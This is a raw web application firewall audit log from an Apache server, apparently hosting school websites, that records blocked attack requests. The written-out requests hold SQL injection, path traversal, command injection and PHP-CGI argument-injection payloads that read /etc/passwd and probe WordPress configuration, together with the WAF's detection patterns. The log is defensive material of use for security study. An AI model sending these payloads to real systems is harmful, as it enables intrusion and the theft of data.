HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cde63e3a-H--
Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745054460231354 850 (- - -)
Stopwatch2: 1745054460231354 850; combined=355, p1=301, p2=0, p3=0, p4=0, p5=54, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cde63e3a-Z--
--470bdf3d-A--
[19/Apr/2025:16:21:58 +0700] aANrNg6cTFSgLAHl7PrJ8gAAAAg 103.236.140.4 56626 103.236.140.4 8181
--470bdf3d-B--
GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.175.188
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.175.188
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:127.0) Gecko/20100101 Firefox/127.0
--470bdf3d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--470bdf3d-E--
--470bdf3d-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||103.236.140.4|F|2"] [data "Matched Data: 1 UNION SELECT md5(999999999) as id from HrmResourceManager found within MATCHED_VAR: 1 UNION SELECT md5(999999999) as id from HrmResourceManager"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745054518263346 5448 (- - -)
Stopwatch2: 1745054518263346 5448; combined=3344, p1=654, p2=2635, p3=0, p4=0, p5=55, sr=158, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--470bdf3d-Z--
--dc4bd512-A--
[19/Apr/2025:16:22:00 +0700] aANrOOvDiFC_ir7MDwbkbAAAAFY 103.236.140.4 56738 103.236.140.4 8181
--dc4bd512-B--
POST /zentao/user-login.html HTTP/1.0
Referer: 103.236.140.4/zentao/user-login.html
Host: 103.236.140.4
X-Real-IP: 165.232.175.188
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.175.188
X-Forwarded-Proto: https
Connection: close
Content-Length: 72
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620
Content-Type: application/x-www-form-urlencoded
--dc4bd512-C--
account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1
--dc4bd512-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dc4bd512-E--
--dc4bd512-H--
Message: Access denied with code 403 (phase 2). Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||103.236.140.4|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745054520284410 2946 (- - -)
Stopwatch2: 1745054520284410 2946; combined=1788, p1=410, p2=1344, p3=0, p4=0, p5=33, sr=69, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dc4bd512-Z--
--fd17a43c-A--
[19/Apr/2025:16:22:00 +0700] aANrOEruoUXZj665VUHoPAAAAMM 103.236.140.4 56740 103.236.140.4 8181
--fd17a43c-B--
GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.175.188
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.175.188
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
--fd17a43c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fd17a43c-E--
--fd17a43c-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745054520285911 1867 (- - -)
Stopwatch2: 1745054520285911 1867; combined=604, p1=389, p2=188, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fd17a43c-Z--
--77cc837c-A--
[19/Apr/2025:16:22:01 +0700] aANrOQ6cTFSgLAHl7PrJ-wAAAAU 103.236.140.4 56794 103.236.140.4 8181
--77cc837c-B--
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.175.188
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.175.188
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
--77cc837c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--77cc837c-E--
--77cc837c-H--
Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||103.236.140.4|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745054521252884 4160 (- - -)
Stopwatch2: 1745054521252884 4160; combined=2544, p1=563, p2=1940, p3=0, p4=0, p5=41, sr=93, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--77cc837c-Z--
--d11cab3b-A--
[19/Apr/2025:16:22:01 +0700] aANrOXNa4dA2HllpK_N98AAAAIw 103.236.140.4 56796 103.236.140.4 8181
--d11cab3b-B--
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.175.188
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.175.188
X-Forwarded-Proto: https
Connection: close
Content-Length: 25
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
Content-Type: application/x-www-form-urlencoded
--d11cab3b-C--
type='|cat /etc/passwd||'
--d11cab3b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d11cab3b-E--
--d11cab3b-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745054521256166 1707 (- - -)
Stopwatch2: 1745054521256166 1707; combined=647, p1=385, p2=229, p3=0, p4=0, p5=32, sr=107, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d11cab3b-Z--
--7ab03325-A--
[19/Apr/2025:16:22:01 +0700] aANrOevDiFC_ir7MDwbkcAAAAEw 103.236.140.4 56802 103.236.140.4 8181
--7ab03325-B--
POST /bsh.servlet.BshServlet HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.175.188
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.175.188
X-Forwarded-Proto: https
Connection: close
Content-Length: 58
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Content-Type: application/x-www-form-urlencoded
--7ab03325-C--
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
--7ab03325-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7ab03325-E--
--7ab03325-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745054521326316 2074 (- - -)
Stopwatch2: 1745054521326316 2074; combined=653, p1=431, p2=187, p3=0, p4=0, p5=35, sr=110, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7ab03325-Z--
--9f29623f-A--
[19/Apr/2025:16:22:03 +0700] aANrO-vDiFC_ir7MDwbkdwAAAEE 103.236.140.4 56906 103.236.140.4 8181
--9f29623f-B--
GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.175.188
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.175.188
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
--9f29623f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9f29623f-E--
--9f29623f-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745054523283217 2003 (- - -)
Stopwatch2: 1745054523283217 2003; combined=513, p1=379, p2=107, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9f29623f-Z--
--133b997e-A--
[19/Apr/2025:16:48:37 +0700] aANxdevDiFC_ir7MDwb4AQAAAEY 103.236.140.4 52056 103.236.140.4 8181
--133b997e-B--
GET /wp-json/wp/v2/users HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 103.253.24.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 103.253.24.90
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
--133b997e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--133b997e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745056117946941 2400 (- - -)
Stopwatch2: 1745056117946941 2400; combined=1174, p1=408, p2=738, p3=0, p4=0, p5=28, sr=61, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--133b997e-Z--
--7f604d4a-A--
[19/Apr/2025:18:19:11 +0700] aAOGr3Na4dA2HllpK_PYGgAAAJc 103.236.140.4 54852 103.236.140.4 8181
--7f604d4a-B--
GET /wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 188.166.52.74
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
Accept: */*
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force
Cookie:
X-Forwarded-For: 188.166.52.74
Accept-Encoding: gzip
X-Varnish: 129014527
--7f604d4a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--7f604d4a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745061551571822 735 (- - -)
Stopwatch2: 1745061551571822 735; combined=254, p1=225, p2=0, p3=0, p4=0, p5=29, sr=59, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7f604d4a-Z--
--c62a3236-A--
[19/Apr/2025:18:19:25 +0700] aAOGvevDiFC_ir7MDwY5ZQAAAEY 103.236.140.4 56328 103.236.140.4 8181
--c62a3236-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 154.94.15.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.94.15.74
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--c62a3236-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c62a3236-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745061565763054 2195 (- - -)
Stopwatch2: 1745061565763054 2195; combined=954, p1=354, p2=579, p3=0, p4=0, p5=21, sr=87, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c62a3236-Z--
--747dc95c-A--
[19/Apr/2025:18:19:30 +0700] aAOGwg6cTFSgLAHl7PolmwAAAAA 103.236.140.4 56806 103.236.140.4 8181
--747dc95c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 154.94.15.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.94.15.74
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--747dc95c-C--
demo.sayHello
--747dc95c-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--747dc95c-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745061570302892 5355 (- - -)
Stopwatch2: 1745061570302892 5355; combined=4004, p1=509, p2=3280, p3=27, p4=30, p5=94, sr=65, sw=64, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--747dc95c-Z--
--2e34d641-A--
[19/Apr/2025:18:35:51 +0700] aAOKlw6cTFSgLAHl7PpAZgAAAAQ 103.236.140.4 42948 103.236.140.4 8181
--2e34d641-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.88.119
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.88.119
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--2e34d641-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2e34d641-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745062551217453 2751 (- - -)
Stopwatch2: 1745062551217453 2751; combined=1258, p1=445, p2=781, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2e34d641-Z--
--1c828f03-A--
[19/Apr/2025:18:35:57 +0700] aAOKnXNa4dA2HllpK_PuxQAAAIY 103.236.140.4 43552 103.236.140.4 8181
--1c828f03-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.88.119
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.88.119
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--1c828f03-C--
demo.sayHello
--1c828f03-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1c828f03-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745062557030642 5715 (- - -)
Stopwatch2: 1745062557030642 5715; combined=4263, p1=543, p2=3488, p3=32, p4=31, p5=97, sr=75, sw=72, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1c828f03-Z--
--9b2d8e4b-A--
[19/Apr/2025:18:42:13 +0700] aAOMFQ6cTFSgLAHl7PpKqgAAAAw 103.236.140.4 52618 103.236.140.4 8181
--9b2d8e4b-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--9b2d8e4b-C--
--9b2d8e4b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9b2d8e4b-E--
--9b2d8e4b-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745062933512660 4481 (- - -)
Stopwatch2: 1745062933512660 4481; combined=3101, p1=536, p2=2531, p3=0, p4=0, p5=34, sr=62, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9b2d8e4b-Z--
--2eb4ce39-A--
[19/Apr/2025:19:06:07 +0700] aAORr3Na4dA2HllpK_MXVQAAAJc 103.236.140.4 49918 103.236.140.4 8181
--2eb4ce39-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.183.251
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.183.251
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--2eb4ce39-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2eb4ce39-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745064367321049 3585 (- - -)
Stopwatch2: 1745064367321049 3585; combined=1827, p1=560, p2=1235, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0
